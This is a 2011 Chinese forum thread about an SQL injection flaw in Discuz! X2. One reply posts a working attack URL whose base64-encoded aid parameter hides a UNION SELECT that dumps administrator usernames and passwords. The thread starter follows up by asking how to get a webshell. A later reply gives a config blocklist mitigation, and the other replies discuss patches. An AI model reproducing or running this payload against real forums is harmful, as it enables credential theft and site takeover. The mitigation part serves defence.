找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
楼主: adnim

Discuz! X2 SQL注射漏洞

[复制链接]

29

主题

434

回帖

1055

积分

金牌会员

积分
1055
发表于 2011-6-29 14:17:37 | 显示全部楼层
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

默認前墜之下爆出管理員帳號密碼。
回复

使用道具 举报

24

主题

111

回帖

316

积分

中级会员

积分
316
 楼主| 发表于 2011-6-29 14:23:04 | 显示全部楼层
求getwebshell
回复

使用道具 举报

152

主题

4514

回帖

9600

积分

论坛元老

积分
9600
发表于 2011-6-29 14:23:29 | 显示全部楼层
新版本我向来不用,不稳定,没经历风雨。我用7.2
回复

使用道具 举报

237

主题

1284

回帖

3413

积分

论坛元老

积分
3413
发表于 2011-6-29 14:27:44 | 显示全部楼层
原帖由 vvx.cc 於 2011-6-29 14:55 發表


新版本我向來不用,不穩定,沒經歷風雨。我用7.2
7.2有xxs漏洞額..
回复

使用道具 举报

29

主题

434

回帖

1055

积分

金牌会员

积分
1055
发表于 2011-6-29 14:53:48 | 显示全部楼层
config/config_global.php 文件中查找代码
$_config['security']['querysafe']['daction']['3'] = '(select';
在下面新增一行代码
$_config['security']['querysafe']['daction'][] = 'unionall';
回复

使用道具 举报

95

主题

1644

回帖

3703

积分

论坛元老

积分
3703
发表于 2011-6-29 14:55:13 | 显示全部楼层
回复

使用道具 举报

52

主题

879

回帖

2060

积分

金牌会员

积分
2060
发表于 2011-6-29 14:57:14 | 显示全部楼层
真伤不起啊,又爆洞洞给解释下是啥子意思?
回复

使用道具 举报

0

主题

2

回帖

6

积分

新手上路

积分
6
发表于 2011-6-29 16:06:04 | 显示全部楼层
补丁出来了...
回复

使用道具 举报

223

主题

3053

回帖

6889

积分

论坛元老

积分
6889
发表于 2011-6-29 16:13:51 | 显示全部楼层
官方升级了?
回复

使用道具 举报

114

主题

1万

回帖

2万

积分

论坛元老

积分
22464
发表于 2011-6-29 16:22:51 | 显示全部楼层
都是些临时工写的代码。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2025-4-20 18:08 , Processed in 0.018848 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表